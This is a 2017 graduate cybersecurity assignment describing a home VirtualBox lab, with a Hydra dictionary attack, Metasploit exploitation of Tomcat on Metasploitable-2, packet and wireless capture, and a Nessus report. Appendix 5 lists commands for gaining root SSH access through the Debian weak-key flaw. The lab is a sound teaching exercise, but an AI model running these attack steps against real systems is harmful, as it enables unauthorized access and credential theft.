Csol 570 Module 7 Assignment

Network Visualization and Vulnerability Detection
CSOL570 Management and Cyber Security

Professor Brian Russell
University of San Diego
Marc Leeka
Module 7 Assignment
March 12, 2017

CSOL570 Management and Cyber Security Vulnerability Detection Marc Leeka
Table of Contents, Tables and Figures
Executive Summary ...................................................................................................................... iii
Trade Studies ..................................................................................................................................1

Figure 1: 2015 Gartner Magic Quadrant for SIEM ..................................................................1
Table 1: Evaluation criteria for SIEM products .........................................................................1
Table 2: Open-Source Network Simulators Survey ..................................................................2
Table 3: Open-Source Vulnerability Scanning Tools Survey ...................................................3
Virtualized Test Lab Architecture ..................................................................................................4
Figure 1: VirtualBox test VM descriptions and addressing ......................................................4
My Security Toolkit ........................................................................................................................5
Table 1: Security Toolkit contents ............................................................................................5
Figure 1: Standard installation default Kali Linux toolkit ........................................................5
Surveillance and Reconnaissance Processes
Scan a network to determine the operating systems installed on hosts ....................................6
Figure 1: Zenmap scan to query a host operating system ...................................................6
Figure 2: Zenmap identifies a host operating system .........................................................7
Figure 3: Zenmap maps a network topology ......................................................................7
Perform a dictionary attach against a hosts SSH service .........................................................8
Figure 1: Probe the SSH port 22 on the Metasploitable-2 server .......................................8
Figure 2: Hydra run from the terminal session ...................................................................8
Figure 3: Configuring password crack using Hydra gui session ........................................9
Figure 4: Password crack for default Metasploitable-2 user MSFADMIN ........................9
Figure 5: Multiple password dictionaries are included with Kali Linux ..........................10
Launch an exploit payload against a vulnerable web service .................................................11
Figure 1: Using nmap to find the Tomcat Web service on a target ..................................11
Figure 2: Using Metasploit to exploit Tomcat modules and find password .....................12
Figure 3: Using Metasploit module to exploit Tomcat SSH private encryption key ........13
Figure 4: We have the Metasploitable-2 SSH key ............................................................14
Figure 5: Using login username and password to take control of Tomcat server .............15
Figure 6: Tomcat server user list administration ..............................................................15
Figure 7: Tomcat server roles list administration .............................................................15
Identify the ports listening on a host .......................................................................................16
Figure 1: Using Nmap to identify open listening ports on a target ...................................16
Eavesdrop on communications between two hosts .................................................................17
Figure 1: packets captured filtered to show only host IP address .....................................17
Figure 2: Wireshark can isolate specific transport protocols or communication packets..18
Figure 3: Decoding encrypted message headers and content ...........................................18
i
Identify the SSID of an active wireless network ....................................................................19

Figure 1: Kismet server console as it captured wireless SSIDs ........................................19
Figure 2: Kismet client console displaying wireless SSIDs and additional detail ............19
Figure 3: Kismet packet capture activity and information for a particular SSID ..............20
Figure 4: Creating a Channel Filter to isolate Kismet SSID scanning .............................20
Figure 5: Kismet channel scanning changed to Channel 11 only .....................................20
Lessons Learned and Final Thoughts ...........................................................................................21
Appendix 1: Oracle VirtualBox installation steps ........................................................................22

Appendix 2: Kali Linux Installation and Settings Configuration .................................................26
Figure 1: VirtualBox Manager Storage Preference for Kali Linux ISO installation ..............30
Figure 2: VirtualBox Manager System Motherboard Preferences ..........................................31
Figure 3: VirtualBox Manager System Processor Preferences ...............................................31
Figure 4: VirtualBox Manager Display Processor Preferences ..............................................32
Figure 5: VirtualBox Manager Network Adapter Preferences ...............................................32
Figure 6: VirtualBox Manager Network Host-only setting vs. Bridged setting .....................33
Figure 7: VirtualBox Manager Storage Preference for Kali Linux ISO installation ..............33
Appendix 3: Metasploitable-2 Installation and Ethernet configuration ........................................34
Figure 1: Communication between the Kali Linux VM and the Metasploitable-2 VM ..........34
Figure 2: Confirm the Kali Linux VM is assigned to the correct subnet ................................35
Figure 3: Confirm the Metasploitable-2 VM is assigned to the correct subnet ......................35
Appendix 4: Results of Metasploitable-2 Vulnerability Scan using Nessus ................................36
Appendix 5: Metasploit Private Key Retrieval .............................................................................39
References ......................................................................................................................................39
ii
Executive Summary
The concept of how to adequately secure a network has greatly expanded in recent years as devices no
one envisioned a decade ago many supplied by employees become new data ports. Training those
responsible for IT security now encompasses how to recognize a multitude of threats to the enterprise.
The availability of new products for security providers to identify, isolate and nullify intrusions also
creates the necessity for training to determine which products best fit the enterprises particular
requirements and then to master the complexity of the sophisticated products that are selected.
The use of a virtualized test lab is a safe, effective and inexpensive method to assess the types of cyber
security tools used in network defense and an opportunity to practice deployment. Learning how to use
basic tools for securing networks against some of the more common penetration strategies is important to
all security personnel. The practice can help security personnel better identify threats, understand the
vulnerability of encryption keys, evaluate vulnerabilities and multiple options to secure them, and
visualize the network perimeter to include portable devices that often are controlled by others.
Use of these tools and the knowledge from this training must be used only in an ethical and professional
manner. Reputation is the most valuable asset any professional can own. The Rotary International 4-Way
Test is the benchmark of whether an action is ethical: are you comfortable if everybody knows about your
intent and your actions? If you pause for only a moment to consider the consequences, then you probably
are doing something that could be considered unethical.
The bad actors who challenge a networks security are like water that flows around any barrier. They will
always find new weaknesses to exploit and security personnel will always play cat-and-mouse to block
them. The skills accrued using virtualized testing labs are one more way of staying ahead of the bad guys.
Shameless pandering to Professor Russell: 20 Critical Security Controls poster on my office door.
iii
Trade Studies
Personal Criteria to Evaluate Network Security Visualization Tools

I reviewed a comprehensive list compiled for the annual Gartner survey of Security Information and
Event Management network security software. All the products were big, complicated and expensive:
IBM Security, HP, LogRhythm, etc.
Figure 1: 2015 Gartner Magic Quadrant for Security Information and Event Management.
Fully understanding the features of these products was way beyond my skill level but I did create a
criteria to evaluate the different products:1
Ease of Administration Visibility Entry Cost

Security Depth Interoperability Total Cost of Operation
Compliance capability Scalability Extensibility
Performance Fault Tolerance Training Materials
Table 1: Evaluation criteria for Security Information and Event Management (SIEM) products.
I am a beginner and have no experience with these products. For this assignment I narrowed my criteria to
only three factors and performed a different survey:
Intuitive ease of use (this is my first tool and I want the fastest gain for the least pain)
Large user base (more answers to questions available on web search and videos)
Open source products that are available at no cost
Fellow student Devin Bock mentioned GNS3 worked well with VirtualBox, so I looked at the package
and found it was easy to install, was simple to use, and was supported by many tutorials on the Internet. I
found many similar open-source simulators that eliminated the initial cost concern.
1
Pros Cons
Cloonix Easy to use
Active development
CORE
GNS3 Large user base due to strong Cisco and
Juniper support
IMUNES
LINE Network Fast Requires 3 dedicated computers
Emulator Reproducible results Complicated setup
Powerful measurement capability Complex
Sparse documentation
Marionnet Attractive GUI No user manual
Intuitive
Mininet Excellent documentation
Large user base
Netkit Good documentation Command line driven
Many prebuilt lab scenarios available
NS-3 Requires programming skills
OFNet
OpenStack all-in-
one (DevStack)
Psimulator2 Basic
Runs on most platforms that support
JAVA
Shadow Reproducible results
Developers can test performance of
distributed or peer-to-peer apps
UNetLab/Eve-NG
VNX and VNUMI Recently updated
Table 2: Open-Source Network Simulators Survey modified from Linkletter pp. 167-168.
Results of the SIEM Study

For the assignment, I chose GNS3, successfully installed the software and activated it.
GNS3 was easy to install but it is a sophisticated product, therefore it required study before I could run
scanning. GNS3 came with the most popular router and switch configurations. My office network is a
simple, single-subnet architecture far below the capabilities of GNS3. I configured a host-to-host
architecture and recorded traffic between the two.
A more comprehensive test would have required a more complicated environment (or costly test lab
investment) and additional training. A thorough comparison by a large IT department would require
considerable investment of time to learn and explore the features unique to each product.
2
Open-Source Vulnerability Scanning Tools Survey

Per the assignment instructions, I briefly researched an OWASP summary (as shown in the Table 3
presentation) and narrowed my choice to only open source products.
Pros Cons
Grabber Included with Kali; simple Slow; not scalable

Grendel-Scan Almost no web information; last bug fix post
was 2015
Nikto Included with Kali; long feature list; QT Any website with an IDS or other security
Frontend GUI interface is downloadable measures in place will detect that you are
scanning it
Vega Included with Kali; multi-platform; GUI Focus is web application testing
interface
Wapiti Acts as a fuzzer Focus is web application testing
Wikto Written for MS .NET Focus is web application testing
Xenotix XSS Exploit Claims to have zero false-positive scans due Focus is web application testing, particularly
Framework to redundancy feature XSS
ZAP Swiss army knife of web assessment tools; Fails to find vulnerabilities in newer apps,
multi-platform more effective for older apps
Zed Attack Proxy Focus is web application testing
Table 3: https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools
I am a beginner and have no experience with these products. I narrowed my criteria to only four factors,
shown in order of importance:
A. Intuitive ease of use (this is my first tool and I want the fastest gain for the least pain);
B. Extensive user base (answers to wide range of questions available by web search and videos);
C. Embedded link between each vulnerability finding and a recommended problem resolution;
D. Comprehensive vulnerability library that is current to date (important as I gain experience with the
tool but not while I am a beginner still learning).
Results of the Open-Source Vulnerability Scanning Tools Survey

I chose Nikto. My research found that reviews categorized most of these products as tools used for web
application testing. I wanted to test network device vulnerabilities, not web sites, thus I minimized my list
quickly. In some reviews Nikto was categorized as a web application testing tool, although I learned you
could test your local devices. Given more time to try each tool, I would check if the others could be used
for a local network. Some tools were designed to harden Linux platforms; my platforms are Windows.
Comparing Nikto to Nessus was not a fair race. Nessus is a commercial product (the free version excludes
most add-in libraries and reporting features); it has a huge installed base; its GUI interface was easy to
comprehend without training; and there are countless Internet tutorials to master the product. Nessus
scanning results could quickly be ranked to focus attention on assets with the greatest critical
vulnerabilities; I could export colorful PDF reports; clicking on a particular vulnerability would link to a
suggested remediation. In short, Nessus was fun to use. Fun products are likely to be used more often.
I included a Nessus report in Appendix 4.
3
Virtualized Test Lab Architecture
My test lab is a computer running Windows 7 Professional 64-bit operating system. The VirtualBox is
configured for four Virtual Machines.
Figure 1: VirtualBox test VM descriptions and addressing.
Virtual Machine 1
Main VM from which attacks are launched and test applications are installed. To shield my office
network from the test environment, the Kali network setting is host-only. Occasionally I need Internet
browser access from the Kali VM (i.e., download Nessus), so I change the network setting to Bridged
or NAT. I installed both GNS3 and Nessus to this VM. Because this VM is my work horse and is
usually booted before the other VMs, it usually gets the first VirtualBox DHCP address from the
range 192.168.56.101 through 56.199. IP assignments may change based on boot order. This VM is
also where I ran WireShark, Airmon-NG, John the Ripper, Hydra and other Kali tools.
Virtual Machine 2
This is the Metasploitable-2 VM which is a VMDK container. When running attacks from the Kali
Virtual Machine 1, the Metasploitable-2 VM must run simultaneously on the same subnet.
Virtual Machine 3
This is the CentOS operating system installation with the WebGoat install from the first assignment.
After I learned the differences among NAT, Bridged and Host-only network settings, I temporarily
assigned a Bridged address to this VM in order to download and install the WebGoat application. If I
were to start this again after learning how the various network settings work, I would install Kali and
skip the CentOS, although it was a good learning experience if I ever need that OS again.
Virtual Machine 4
This is a Windows OS VM in which I installed the SolarWinds SIEM test environment. I chose
Windows because I was more comfortable with the Windows version of the SolarWinds trial
application.
My installation for Kali Linux and Oracle VirtualBox is documented in Appendices 1 and 2.
4
My Security Toolkit
Purpose Notes
SolarWinds Server and application monitor 30-day free trial; $2995 starter package
GNS3 Design and test network architecture in a Open source
virtual environment
Nessus Network vulnerability tester Free home license for <16 IP addresses
Wireshark Capture and decode network packets Included with Kali Linux install
Nitko Webserver vulnerability scanner Included with Kali Linux install
Kismet Wireless signal capture Included with Kali Linux install
Aircrack-NG Multi-purpose wireless attack suite Included with Kali Linux install
Google Earth Maps KML wireless GPS data capture files Free download
Hydra Password brute force utility Included with Kali Linux install
John the Ripper Password brute force utility Included with Kali Linux install
Zenmap GUI version of nmap network discovery Included with Kali Linux install
Metasploit Platform for developing, testing and Included with Kali Linux install
executing exploits
Table 1: Security Toolkit contents.
The default Kali Linux installation includes 300+ utilities that are grouped into 13 categories. There are
multiple tools available for password brute force attacks, for example. As my security testing experience
grows, there are plenty of opportunities to try new tools.
Figure 1: Standard installation default Kali Linux toolkit.
5
Surveillance and Reconnaissance Processes
Scan a network to determine the operating systems installed on hosts
For the Module One assignment, I used Nmap to scan for open ports. For this assignment, I used Nmap
with the O option to guess the host operating system. Then I used the Zenmap GUI version of Nmap to
scan a specific workstation in my office subnet.
Figure 1: Zenmap scan to query a host operating system.
6
Figure 2: Zenmap identifies a host operating system.
Figure 3: Zenmap maps a network topology.
7
Perform a dictionary attack against a hosts SSH server
I used Hydra for this assignment.
Figure 1: Probe the SSH port 22 on the Metasploitable-2 server.
First, make sure the SSH port 22 is open and listening on our Metasploitable-2 server
Figure 2: Hydra run from the terminal session.
We can perform a brute force password attack using Hydra. We will feed it the built-in password text file
from another brute force tool John (which is included in the default Kali installation).
To open the gui Hydra interface:

root@kali:~# xhydra # opens the gui Hydra interface
8
Set the number of tasks to 1 to reduce congestion and the chance the other server might detect the attack.
Reducing the tasks, however, will make Hydra take longer to complete.
Figure 3: Configuring password crack using Hydra gui session.
I used a password file that contained 3,546 entries and I was unsuccessful cracking the Metasploitable-2
username root. Because I knew the default user msfadmin password, I edited the password file list to
include the entry msfadmin just to verify the utility worked. I ran the attack against the user
MSFADMIN and it discovered the username and password combination.
Figure 4: Password crack for default Metasploitable-2 user MSFADMIN.
9
The default Kali Linux installation includes many password dictionary files.
Figure 5: Multiple password dictionaries are included with Kali Linux.
I ran Hydra using the rockyou.txt password file containing 14,344,392 entries. After running 24 hours and
450,000 unsuccessful attempts to crack the Metasploitable root password, I stopped the utility so that I
could use my test lab computer for other purposes.
I developed a great appreciation for how easy it was to obtain the software and dictionary to perform a
real-world brute force attack.
10
Launch an exploit payload against a vulnerable web service
For this assignment to launch an exploit payload against a web service, I used Nmap to query the
Metasploitable-2 VM for vulnerabilities. I found open port 8180 and identified the web service as Apache
Tomcat.
Figure 1: Using nmap to find the Tomcat Web service on a target.
11
From my Kali Linux VM attack station, I opened the Metasploit console to search for Tomcat module
exploit scripts.
I ran the exploit module which required that I set attack parameters. I found the Metasploitable-2 Tomcat
administration username and password.
Figure 2: Using Metasploit to exploit Tomcat modules and find administrative username and password.
12
Using the administrator username and password, I ran another Tomcat exploit module to find the SSH
private encryption key.
Figure 3: Using Metasploit module to exploit Tomcat SSH private encryption key.
13
Figure 4: We have the Metasploitable-2 SSH private encrytionkey.
14
We now have the privateencrytion key.
Following a procedure, we can regenerate the SSH-RAS and take control of the authentication
encryption.3 This assignment did not ask us to complete that step, but we could use the administrative
login username and password we found earlier to take control of the Tomcat web server.
Figure 5: Using login username and password to take control of Tomcat server.
We can add and delete authorized users. We can change passwords.
Figure 6: Tomcat server user list administration.
We can elevate user roles.
Figure 7: Tomcat server roles list administration.
15
Identify the ports listening on a host
Figure 1: Using Nmap to identify open listening ports on a target.
I used Nmap on the Kali Linux VM station to identify open listening ports on the Metasploitable-2 VM.
16
Eavesdrop on communications between two hosts
I used Wireshark to eavesdrop between two hosts. Wireshark allows you to filter the source and
destination addresses to minimize the information on your screen.
I configured my Kali Linux VM for Bridged mode to allow Internet traffic. In particular, I was looking
for encrypted communication traffic between my DNS server 192.168.4.7 and the VM with the address
192.168.4.195.
Figure 1: packets captured filtered to show only host IP address 192.168.4.7.
17
Figure 2: Wireshark can isolate specific transport protocols or communication packets.
In this example I isolated the TLS protocol exchange and identified the encrypted message.
Figure 3: Decoding encrypted message headers and content.
18
Identify the SSID of an active wireless network
Kismet is a server and client combination. The Kismet server console shows local SSIDs as they are
captured.
Figure 1: Kismet server console as it captured wireless SSIDs.
The Kismet client console presents wireless SSID information in an easy-to-quickly-comprehend format.
SSIDs are color-coded to quickly identify potentially vulnerable wireless configurations.
Figure 2: Kismet client console displaying wireless SSIDs and additional detail.
Type A = access point.

Green indicates open access points.
Red indicates access points that may have factory default settings.
19
Figure 3: Kismet packet capture activity and information for a particular SSID.
Knowing the wireless access point manufacturer will help us find vulnerabilities for that model.
Figure 4: Creating a Channel Filter to isolate Kismet SSID scanning.
Isolating a particular wireless channel will reduce the visual information we analyze.
Figure 5: Kismet channel scanning changed to Channel 11 only.
20
Lessons Learned and Final Thoughts
A test platform is a safe what-if environment that allows for experimentation and scenario testing. A
graduate program prepares us to become the Chief Information Officer, but even the highest-paid CIO at
a large enterprise should have experience doodling on a Kali test platform. The CIO might not use a test
platform daily but certainly the CIO would direct others using test platforms to solve problems and
answer questions. Test platforms are our practice for preparation.
From the test platform experience I learned there were many applications available to address the
assignment objective and the final selection could involve cost, complexity, learning curve, thoroughness,
reliability, reputation, features and support. I discovered that many tools were quite simple to master it
was the test environment that demanded the greatest investment of time and thought.
Some rules I learned:

Allow plenty of time to prepare the test environment. Something will not work and it might take
weeks to figure out a simple configuration adjustment. Better to solve this at our convenience than
when the enterprise is down.
The VirtualBox network preference configuration is important and an incorrect setting could make
your network leak into a working environment.
The Metasploitable 2 VM is an interesting and extremely valuable training tool. It offers dozens of
different opportunities to practice different exploits. Internet tutorials abound.
Some of the most simple and command terminal session commands such as Nmap yield a treasure
trove of valuable information in seconds.
Many of the tools included with the default Kali Linux installation are easily mastered and very
powerful. It would be wise for a security student to casually sample those tools to prepare before they
are in a crisis situation. Wireshark and Kismet are logically-designed utilities that provide huge
results in a short time for little training.
Networks are expanding by the inclusion of devices that users find convenient but are often poorly
designed for security. The network perimeter is only as strong as its weakest point. New tools must be
developed to constantly monitor and discover network vulnerabilities that an IT staff may not be aware
of. Training for the IT staff must be broadened to encompass new threats, and users must also be trained
to recognize how they can create security breaches just by using their favorite device.
Understanding how threat surfaces are expanding is critical when you plan for potential new threats.
Recognizing, hardening architectures and responding to new threats will take more skills than any single
person can ever possess. The expertise and experience just to understand the expanded surface will likely
become so specialized that it will become a specialty; likewise the increasingly more advanced skill set to
properly configure preventative measures and monitor systems will become a specialty separate from the
skills responders must possess when a problem is detected.
The potential threats will only increase in the future. This is a good time to be trained in this field.
21
Appendix 1: Oracle VirtualBox installation
22
23
24
Also, install the extensions found at https://www.virtualbox.org/wiki/Downloads
25
Appendix 2: Kali Linux Installation and Settings Configuration
Download the most recent Kali Linux ISO from https://www.kali.org/downloads/
The host is a 64-bit Windows computer.
The Kali Linux ISO will be installed after configure a new VM, the you start the VM and the Linux ISO
will prompt you for installation instructions.
26
27
28
Create the Kali Linux VM VMDK and finish.
29
Figure 1: VirtualBox Preferences Network Host-only Preferences for the internal DCHP server.
Verify the host VirtualBox Preferences Network Detail is correct in order that the two VMs can
communicate with one another on an internal-only subnet that will not interfere with other network
traffic.
a) Never expose this VM to an untrusted network, use NAT or Host-only mode!
https://www.offensive-security.com/metasploit-unleashed/requirements/
b) VirtualBox has a virtual NAT server built-in to its software to allow for basic routing. Any basic
VirtualBox install will be able to use DHCP to connect to use the host machines network via the
NAT setup in VirtualBox.
http://superuser.com/questions/961526/problems-with-local-networking-on-kali-linux
c) The default VirtualBox configuration is set for the subnet 192.168.56.xx.
30
Figure 2: VirtualBox Manager System Motherboard Preferences.
Figure 3: VirtualBox Manager System Processor Preferences.
31
Figure 4: VirtualBox Manager Display Processor Preferences.
Figure 5: VirtualBox Manager Network Adapter Preferences.
32
Figure 6: VirtualBox Manager Network Host-only setting vs. Bridged setting.
Figure 7: VirtualBox Manager Storage Preference for Kali Linux ISO installation.
Start your Kali VM. The Kali Linux ISO will begin to install itself. Choose the GUI installation interface
and accept all default recommendations.
33
Appendix 3: Metasploitable-2 Installation and Ethernet configuration
Downloaded the Metasploitable 2 Virtual Machine Disk image (VMDK) from

https://sourceforge.net/projects/metasploitable/.
Create a New Metasploitable-2 VM in the VirtualBox using the downloaded Metasploitable-2 VMDK
image.
Figure 1: Communication between the Kali Linux VM and the Metasploitable-2 VM.
Confirm that the VM Promiscuous Mode is enabled.
34
Start the Kali Linux VM in the Host-only Network mode.

a) Login as root.
b) Open Terminal window.
c) Run IFCONFIG to obtain assigned IP address for the Kali Linux VM and confirm it is in the correct
subnet.
Figure 2: Confirm the Kali Linux VM is assigned to the correct subnet.
Start the Metasploitable-2 VM.

a) Login as default user msfadmin, password is msfadmin.
b) Open Terminal window.
c) Run IFCONFIG to obtain assigned IP address for the Metasploitable-2 VM and confirm it is in the
correct subnet.
Figure 3: Confirm the Metasploitable-2 VM is assigned to the correct subnet.
35
Appendix 4: Results of Metasploitable-2 Vulnerability Scan using Nessus
192.168.56.102
Critical High Medium Low Info Total

8 2 22 8 65 105
Severity Plugin Id Name

Critical (10.0) 10203 rexecd Service Detection
Debian OpenSSH/OpenSSL Package Random Number Generator
Critical (10.0) 32314
Weakness
Debian OpenSSH/OpenSSL Package Random Number Generator
Critical (10.0) 32321
Weakness (SSL check)
Critical (10.0) 33850 Unix Operating System Unsupported Version Detection
Critical (10.0) 34970 Apache Tomcat Manager Common Administrative Credentials
Critical (10.0) 51988 Rogue Shell Backdoor Detection
Critical (10.0) 55523 vsftpd Smiley Face Backdoor
Critical (10.0) 61708 VNC Server 'password' Password
High (7.5) 10205 rlogin Service Detection
High (7.5) 34460 Unsupported Web Server Detection
Medium (6.8) 82580 Samba 3.0.0 'SamrChangePassword' RCE
Medium (6.8) 90509 Samba Badlock Vulnerability
Medium (6.4) 11356 NFS Exported Share Information Disclosure
Medium (6.4) 51192 SSL Certificate Cannot Be Trusted
Medium (6.4) 57582 SSL Self-Signed Certificate
Medium (5.8) 42263 Unencrypted Telnet Server
Medium (5.0) 10079 Anonymous FTP Enabled
Medium (5.0) 11213 HTTP TRACE / TRACK Methods Allowed
Medium (5.0) 15901 SSL Certificate Expiry
Medium (5.0) 20007 SSL Version 2 and 3 Protocol Detection
Medium (5.0) 42256 NFS Shares World Readable
Medium (5.0) 42873 SSL Medium Strength Cipher Suites Supported
Medium (5.0) 45411 SSL Certificate with Wrong Hostname
Medium (5.0) 57608 SMB Signing Disabled
Medium (5.0) 81606 SSL/TLS EXPORT_RSA <= 512-bit Cipher Suites Supported (FREAK)
Medium (5.0) 94437 SSL 64-bit Block Size Cipher Suites Supported (SWEET32)
Medium (4.3) 26928 SSL Weak Cipher Suites Supported
Medium (4.3) 57792 Apache HTTP Server httpOnly Cookie Information Disclosure
SSLv3 Padding Oracle On Downgraded Legacy Encryption Vulnerability
Medium (4.3) 78479
(POODLE)
Medium (4.3) 90317 SSH Weak Algorithms Supported
Medium (4.0) 52611 SMTP Service STARTTLS Plaintext Command Injection
36
SSL DROWN Attack Vulnerability (Decrypting RSA with Obsolete and

Medium (4.0) 89058
Weakened eNcryption)
Low (2.6) 10407 X Server Detection
Low (2.6) 31705 SSL Anonymous Cipher Suites Supported
Low (2.6) 34324 FTP Supports Cleartext Authentication
Low (2.6) 65821 SSL RC4 Cipher Suites Supported (Bar Mitzvah)
Low (2.6) 70658 SSH Server CBC Mode Ciphers Enabled
Low (2.6) 71049 SSH Weak MAC Algorithms Enabled
SSL/TLS EXPORT_DHE <= 512-bit Export Cipher Suites Supported
Low (2.6) 83738
(Logjam)
Low (2.6) 83875 SSL/TLS Diffie-Hellman Modulus <= 1024 Bits (Logjam)
Info 10028 DNS Server BIND version Directive Remote Version Detection
Info 10092 FTP Server Detection
Info 10107 HTTP Server Type and Version
Info 10114 ICMP Timestamp Request Remote Date Disclosure
Info 10150 Windows NetBIOS / SMB Remote Host Information Disclosure
Info 10223 RPC portmapper Service Detection
Info 10263 SMTP Server Detection
Info 10267 SSH Server Type and Version Information
Info 10281 Telnet Server Detection
Info 10287 Traceroute Information
Info 10342 VNC Software Detection
Info 10394 Microsoft Windows SMB Log In Possible
Info 10397 Microsoft Windows SMB LanMan Pipe Server Listing Disclosure
Info 10437 NFS Share Export List
Info 10719 MySQL Server Detection
Microsoft Windows SMB NativeLanManager Remote System Information
Info 10785
Disclosure
Info 10863 SSL Certificate Information
Info 10881 SSH Protocol Versions Supported
Info 11002 DNS Server Detection
Info 11011 Microsoft Windows SMB Service Detection
Info 11111 RPC Services Enumeration
Info 11153 Service Detection (HELP Request)
Info 11154 Unknown Service Detection: Banner Retrieval
Info 11219 Nessus SYN scanner
Info 11422 Web Server Unconfigured - Default Install Page Present
Info 11424 WebDAV Detection
Info 11819 TFTP Daemon Detection
Info 11936 OS Identification
Info 18261 Apache Banner Linux Distribution Disclosure
Info 19288 VNC Server Security Type Detection
Info 19506 Nessus Scan Information
Info 20108 Web Server / Application favicon.ico Vendor Fingerprinting
37
Info 21186 AJP Connector Detection

Info 21643 SSL Cipher Suites Supported
Info 22227 RMI Registry Detection
Info 22964 Service Detection
Info 24260 HyperText Transfer Protocol (HTTP) Information
Info 25220 TCP/IP Timestamps Supported
Info 25240 Samba Server Detection
Info 26024 PostgreSQL Server Detection
Info 35371 DNS Server hostname.bind Map Hostname Disclosure
Info 35716 Ethernet Card Manufacturer Detection
Info 39446 Apache Tomcat Default Error Page Version Detection
Info 39519 Backported Security Patch Detection (FTP)
Info 39520 Backported Security Patch Detection (SSH)
Info 39521 Backported Security Patch Detection (WWW)
Info 42088 SMTP Service STARTTLS Command Support
Info 45410 SSL Certificate commonName Mismatch
Info 45590 Common Platform Enumeration (CPE)
Info 48243 PHP Version
Info 50845 OpenSSL Detection
Info 51891 SSL Session Resume Supported
Info 52703 vsftpd Detection
Info 53335 RPC portmapper (TCP)
Info 54615 Device Type
Info 56984 SSL / TLS Versions Supported
Info 57041 SSL Perfect Forward Secrecy Cipher Suites Supported
Info 62563 SSL Compression Methods Supported
Info 65792 VNC Server Unencrypted Communication Detection
Info 66334 Patch Report
Info 70544 SSL Cipher Block Chaining Cipher Suites Supported
Info 70657 SSH Algorithms and Languages Supported
Info 72779 DNS Server Version Detection
Info 84574 Backported Security Patch Detection (PHP)
Server Message Block (SMB) Protocol Version 1 Enabled (uncredentialed
Info 96982
check)
38
Appendix 5: Metasploit Private Key retrieval
This is a summary of how to regenerate the SSH-RAS and take control of the authentication encryption.3
root@kali:~# /pentest/exploits/exploitdb/searchsploit openssl
find the script /multiple/remote/5622.txt
root@kali:~# cat /pentest/exploits/exploitdb/platforms/multiple/remote/5622.txt
Follow the instructions to download the exploitdb.com file
root@kali:~# wget http://www.
root@kali:~# tar -xvf debian_ssh_rsa_2048_x86.tar.bz2
root@kali:~# ls
root@kali:~# cd rsa
root@kali:~# ls
root@kali:~# cd 2048
root@kali:~# greg -lr [paste key] *.pub
That creates a new .pub file.
root@kali:~# ssh -I [paste new filename without extension] root root@192.168.56.102
Continue? Yes
root@kali:~# id
root@kali:~# whoami
References
1
Burnham, J. (2015, July 23). Who is a Leader (again) in Gartners 2015 Magic Quadrant For Security Information
Event Management? Retrieved on February 4, 2017, from https://securityintelligence.com/ibm-is-a-leader-again-in-
2015-gartner-magic-quadrant-for-siem/
2
Linkletter, B. (2017, January 31). Open-Source Network Simulators. Retrieved on February 6, 2017, from
http://www.brianlinkletter.com/open-source-network-simulators/
3
Metasploit Tomcat server. https://www.youtube.com/watch?v=o8_qLxPW--s
39

Csol 570 Module 7 Assignment

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Csol 570 Module 7 Assignment

Uploaded by

Copyright:

Available Formats

Network Visualization and Vulnerability Detection

CSOL570 Management and Cyber Security

March 12, 2017

Table of Contents, Tables and Figures

Executive Summary ...................................................................................................................... iii

Trade Studies ..................................................................................................................................1

Identify the SSID of an active wireless network ....................................................................19

Appendix 1: Oracle VirtualBox installation steps ........................................................................22

Personal Criteria to Evaluate Network Security Visualization Tools

Ease of Administration Visibility Entry Cost

Results of the SIEM Study

Open-Source Vulnerability Scanning Tools Survey

Grabber Included with Kali; simple Slow; not scalable

Results of the Open-Source Vulnerability Scanning Tools Survey

I included a Nessus report in Appendix 4.

Virtualized Test Lab Architecture

Figure 1: VirtualBox test VM descriptions and addressing.

Figure 1: Standard installation default Kali Linux toolkit.

Surveillance and Reconnaissance Processes

Scan a network to determine the operating systems installed on hosts

Figure 1: Zenmap scan to query a host operating system.

Figure 2: Zenmap identifies a host operating system.

Figure 3: Zenmap maps a network topology.

Perform a dictionary attack against a hosts SSH server

I used Hydra for this assignment.

Figure 1: Probe the SSH port 22 on the Metasploitable-2 server.

Figure 2: Hydra run from the terminal session.

To open the gui Hydra interface:

Figure 3: Configuring password crack using Hydra gui session.

Figure 4: Password crack for default Metasploitable-2 user MSFADMIN.

Figure 5: Multiple password dictionaries are included with Kali Linux.

Launch an exploit payload against a vulnerable web service

Figure 1: Using nmap to find the Tomcat Web service on a target.

Figure 4: We have the Metasploitable-2 SSH private encrytionkey.

We now have the privateencrytion key.

We can add and delete authorized users. We can change passwords.

Figure 6: Tomcat server user list administration.

We can elevate user roles.

Figure 7: Tomcat server roles list administration.

Identify the ports listening on a host

Figure 1: Using Nmap to identify open listening ports on a target.

Eavesdrop on communications between two hosts

Figure 1: packets captured filtered to show only host IP address 192.168.4.7.

Figure 2: Wireshark can isolate specific transport protocols or communication packets.

Figure 3: Decoding encrypted message headers and content.

Identify the SSID of an active wireless network

Figure 1: Kismet server console as it captured wireless SSIDs.

Type A = access point.

Figure 4: Creating a Channel Filter to isolate Kismet SSID scanning.

Figure 5: Kismet channel scanning changed to Channel 11 only.

Lessons Learned and Final Thoughts

Some rules I learned:

Appendix 1: Oracle VirtualBox installation

Also, install the extensions found at https://www.virtualbox.org/wiki/Downloads

Appendix 2: Kali Linux Installation and Settings Configuration

Download the most recent Kali Linux ISO from https://www.kali.org/downloads/

The host is a 64-bit Windows computer.

Create the Kali Linux VM VMDK and finish.

Figure 2: VirtualBox Manager System Motherboard Preferences.

Figure 3: VirtualBox Manager System Processor Preferences.

Figure 4: VirtualBox Manager Display Processor Preferences.

Figure 5: VirtualBox Manager Network Adapter Preferences.

Figure 6: VirtualBox Manager Network Host-only setting vs. Bridged setting.